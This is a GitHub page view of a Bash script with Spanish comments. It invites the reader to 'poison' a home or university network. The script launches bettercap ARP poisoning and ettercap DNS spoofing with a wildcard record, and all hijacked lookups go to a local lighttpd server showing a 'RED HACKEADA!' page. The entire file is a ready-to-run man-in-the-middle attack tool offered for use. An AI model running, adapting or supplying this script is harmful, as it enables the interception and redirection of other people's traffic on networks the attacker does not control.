-
Notifications
You must be signed in to change notification settings - Fork 0
/
thebloodw.sh
136 lines (122 loc) · 4.69 KB
/
thebloodw.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
#!/bin/bash
####################
#
# Conquista tu red!
#
# Por Theblood!
#
##################################
#
# Envenena la red de tu hogar o Universidad con este script!
# basta con tener ettercap y bettercap instalado en tu sistema para poder ejecutarlo
# correctamente todo lo demas *-* lo hace este script ! <Theblood>!
######################################################################################
# Directorio temporal
TMP="/tmp/theblood$$"
# Creamos directorio
mkdir -p "$TMP/www"
# Crear archivo de configuración de lighhtpd
makeconfig() {
cat << EOF >"$TMP/lighttpd.cfg"
# lighttpd configuration file
server.modules = ("mod_access","mod_accesslog","mod_rewrite","mod_redirect")
index-file.names = ( "index.html")
mimetype.assign = (".html" => "text/html")
url.rewrite-once = ("^/(.*)$" => "/index.html")
url.redirect = ("^/$" => "/index.html")
server.errorlog = "$TMP/lighttpd.log"
server.document-root = "$TMP/www"
server.pid-file = "$TMP/lighttpd.pid"
accesslog.filename = "$TMP/lighttpd.log"
EOF
}
# Crear el index por defecto
makeindex() {
cat << EOF >"$TMP/www/index.html"
<html>
<head>
<title>ACCESO DENEGADO</title>
</head>
<body BGCOLOR="BLACK" TEXT="RED">
<table WIDTH="100%" HEIGHT="100%"><tr>
<td VALIGN="MIDDLE" ALIGN="CENTER">
<h1><b>RED HACKEADA!</b></h1>
</td></tr>
</table>
</body>
</html>
EOF
}
# Ponemos en marcha el servidor y lanzamos el ataque
attack() {
echo ""
echo "[1;34m --> Poniendo en marcha el servidor web..."
echo "[1;31m"
lighttpd -f "$TMP/lighttpd.cfg"
sleep 1
echo "[1;34m --> Poniendo en marcha envenenamiento ARP..."
echo "[1;31m"
INTERFACE="$(ip route show|grep ' src '|cut -d' ' -f3)"
xterm -title "ARP Poisoning" -fg green -e "sudo bettercap -X -L -i $INTERFACE" & ETTER_1=$!
sleep 1
echo "[1;34m --> Poniendo en marcha falsificación de resoluciones DNS..."
echo "[1;31m"
SERVER="$(ip route show|grep ' src '|cut -d' ' -f12)"
echo "* A $SERVER" >/etc/ettercap/etter.dns
xterm -title "DNS Spoofing" -fg green -e "ettercap -Tq -i $INTERFACE -P dns_spoof" & ETTER_2=$!
sleep 1
echo "[0m --------------------------------------------------------------------------- "
echo " [1;33mEl ataque se está ejecutando!"
echo " Pulsa la tecla \"Enter\" para detener el ataque y salir.[0m"
read junk
sleep 1
clear
# Hacemos limpieza y salimos
kill $(cat "$TMP/lighttpd.pid" 2>/dev/null) $ETTER_1 $ETTER_2 2>/dev/null
rm -rf "$TMP"
exit
}
# Leer opción
readoption() {
cat << EOF
[1;34m
Elige una opción:
1) Continuar
2) Editar index.html
3) Visualizar index.html
0) Salir
EOF
echo -n " ?> "
read RESP
case $RESP in
1 ) sleep 1; clear; banner; attack;;
2 ) sleep 1; (geany "$TMP/www/index.html"||leafpad "$TMP/www/index.html") & banner; readoption;;
3 ) sleep 1; firefox "$TMP/www/index.html" & banner; readoption;;
0 ) sleep 1; clear; rm -rf "$TMP"; exit;;
* ) sleep 1; echo "[1;34m
Opción incorrecta";sleep 1; banner; readoption;;
esac
}
# Banner de bienvenida
banner() {
clear
sleep 0.1s; echo " [1;34m "
sleep 0.1s; echo "╔════╦╗────╔══╗╔╗────────╔╦═══╗──────╔╗"
sleep 0.1s; echo "║╔╗╔╗║║────║╔╗║║║────────║║╔═╗║──────║║"
sleep 0.1s; echo "╚╝║║╚╣╚═╦══╣╚╝╚╣║╔══╦══╦═╝║╚══╦╗─╔╦══╣║"
sleep 0.1s; echo "──║║─║╔╗║║═╣╔═╗║║║╔╗║╔╗║╔╗╠══╗║║─║║══╬╝"
sleep 0.1s; echo "──║║─║║║║║═╣╚═╝║╚╣╚╝║╚╝║╚╝║╚═╝║╚═╝╠══╠╗"
sleep 0.1s; echo "──╚╝─╚╝╚╩══╩═══╩═╩══╩══╩══╩═══╩═╗╔╩══╩╝"
sleep 0.1s; echo "──────────────────────────────╔═╝║"
sleep 0.1s; echo "──────────────────────────────╚══╝"
sleep 0.1s; echo ">>>>>>OneHackerLife!<<<<<!"
sleep 0.1s; echo " [0m"
echo " ---------------------------------------------------------------------------
[1;33m ->THebloodSys! envenanmiento de ip y ademas dns spoofing para
resolver las direcciones y apuntarlas hacia nuestro servidor
montado localmente con nuestra configuracion.!
[0m
--------------------------------------------------------------------------- "
}
# Se inica el programa
makeconfig && makeindex && banner && readoption